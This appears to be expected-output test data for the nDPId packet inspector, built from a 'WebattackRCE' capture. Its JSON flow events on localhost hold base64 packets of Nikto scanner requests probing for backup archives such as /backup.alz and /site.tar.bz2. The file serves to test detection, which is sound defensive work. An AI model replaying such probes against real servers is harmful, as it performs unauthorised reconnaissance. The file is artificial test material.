+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":334,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277207,"flow_last_seen":1576420277207,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277207,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50212,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":334,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":334,"flow_packet_id":1,"flow_last_seen":1576420277207,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277207,"pkt":"AAAAAAAAAAAAAAAACABFAADELblAAEAGDnl\/AAABfwAAAcQkH5A1yBUjW63h5IAYAED+uAAAAQEICp1m\/P+dZvz\/R0VUIC8xMjcwLnRhci5iejIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":334,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277207,"flow_last_seen":1576420277207,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277207,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50212,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":335,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277209,"flow_last_seen":1576420277209,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277209,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50214,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":335,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":335,"flow_packet_id":1,"flow_last_seen":1576420277209,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277209,"pkt":"AAAAAAAAAAAAAAAACABFAADDSgRAAEAG8i5\/AAABfwAAAcQmH5DZEXKVufuNq4AYAED+twAAAQEICp1m\/QCdZv0AR0VUIC8xMjcuMC4wLmFseiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":335,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277209,"flow_last_seen":1576420277209,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277209,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50214,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":336,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277210,"flow_last_seen":1576420277210,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277210,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50216,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":336,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":336,"flow_packet_id":1,"flow_last_seen":1576420277210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277210,"pkt":"AAAAAAAAAAAAAAAACABFAADDtt9AAEAGhVN\/AAABfwAAAcQoH5DVr45M6gY7v4AYAED+twAAAQEICp1m\/QKdZv0CR0VUIC8xMjcuMC4wLmFseiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":336,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277210,"flow_last_seen":1576420277210,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277210,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50216,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":337,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277211,"flow_last_seen":1576420277211,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277211,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50218,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":337,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":337,"flow_packet_id":1,"flow_last_seen":1576420277211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277211,"pkt":"AAAAAAAAAAAAAAAACABFAAC9XspAAEAG3W5\/AAABfwAAAcQqH5Bdf2ZfE+bMgYAYAED+sQAAAQEICp1m\/QOdZv0DR0VUIC8wLnRneiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":337,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277211,"flow_last_seen":1576420277211,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277211,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50218,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":338,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277213,"flow_last_seen":1576420277213,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277213,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50220,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":338,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":338,"flow_packet_id":1,"flow_last_seen":1576420277213,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277213,"pkt":"AAAAAAAAAAAAAAAACABFAAC9v\/9AAEAGfDl\/AAABfwAAAcQsH5CYPYdrmayyCIAYAED+sQAAAQEICp1m\/QWdZv0FR0VUIC8wLnRneiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":338,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277213,"flow_last_seen":1576420277213,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277213,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50220,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":339,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277215,"flow_last_seen":1576420277215,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277215,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50222,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":339,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":339,"flow_packet_id":1,"flow_last_seen":1576420277215,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277215,"pkt":"AAAAAAAAAAAAAAAACABFAADCrDVAAEAGj\/5\/AAABfwAAAcQuH5DnZJSlMCY5doAYAED+tgAAAQEICp1m\/QedZv0GR0VUIC9iYWNrdXAuYWx6IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":339,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277215,"flow_last_seen":1576420277215,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277215,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50222,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":340,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277216,"flow_last_seen":1576420277216,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277216,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50224,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":340,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":340,"flow_packet_id":1,"flow_last_seen":1576420277216,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277216,"pkt":"AAAAAAAAAAAAAAAACABFAADC6alAAEAGUop\/AAABfwAAAcQwH5AB5dFAi0ifwYAYAED+tgAAAQEICp1m\/QidZv0IR0VUIC9iYWNrdXAuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":340,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277216,"flow_last_seen":1576420277216,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277216,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50224,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":341,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277217,"flow_last_seen":1576420277217,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277217,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50226,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":341,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":341,"flow_packet_id":1,"flow_last_seen":1576420277217,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277217,"pkt":"AAAAAAAAAAAAAAAACABFAADHXwtAAEAG3SN\/AAABfwAAAcQyH5CeyGeSqwnqXYAYAED+uwAAAQEICp1m\/QmdZv0JR0VUIC8xMjcwMDEudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} +01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":341,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277217,"flow_last_seen":1576420277217,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277217,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50226,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":342,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277218,"flow_last_seen":1576420277218,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277218,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50228,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":342,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":342,"flow_packet_id":1,"flow_last_seen":1576420277218,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277218,"pkt":"AAAAAAAAAAAAAAAACABFAADHKPlAAEAGEzZ\/AAABfwAAAcQ0H5BMBRBwjCFtgIAYAED+uwAAAQEICp1m\/QqdZv0KR0VUIC8xMjcwMDEudGFyLmx6bWEgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":342,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277218,"flow_last_seen":1576420277218,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277218,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50228,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":343,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277219,"flow_last_seen":1576420277219,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277219,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50230,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":343,"flow_packet_id":1,"flow_last_seen":1576420277219,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277219,"pkt":"AAAAAAAAAAAAAAAACABFAADE4jtAAEAGWfZ\/AAABfwAAAcQ2H5DSrNqhX1PVN4AYAED+uAAAAQEICp1m\/QudZv0LR0VUIC9zaXRlLnRhci5iejIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":343,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277219,"flow_last_seen":1576420277219,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277219,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50230,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":344,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277221,"flow_last_seen":1576420277221,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277221,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50232,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":344,"flow_packet_id":1,"flow_last_seen":1576420277221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277221,"pkt":"AAAAAAAAAAAAAAAACABFAADEaVlAAEAG0th\/AAABfwAAAcQ4H5ChqlHP+pxqwIAYAED+uAAAAQEICp1m\/Q2dZv0NR0VUIC9zaXRlLnRhci5iejIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":344,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277221,"flow_last_seen":1576420277221,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277221,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50232,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 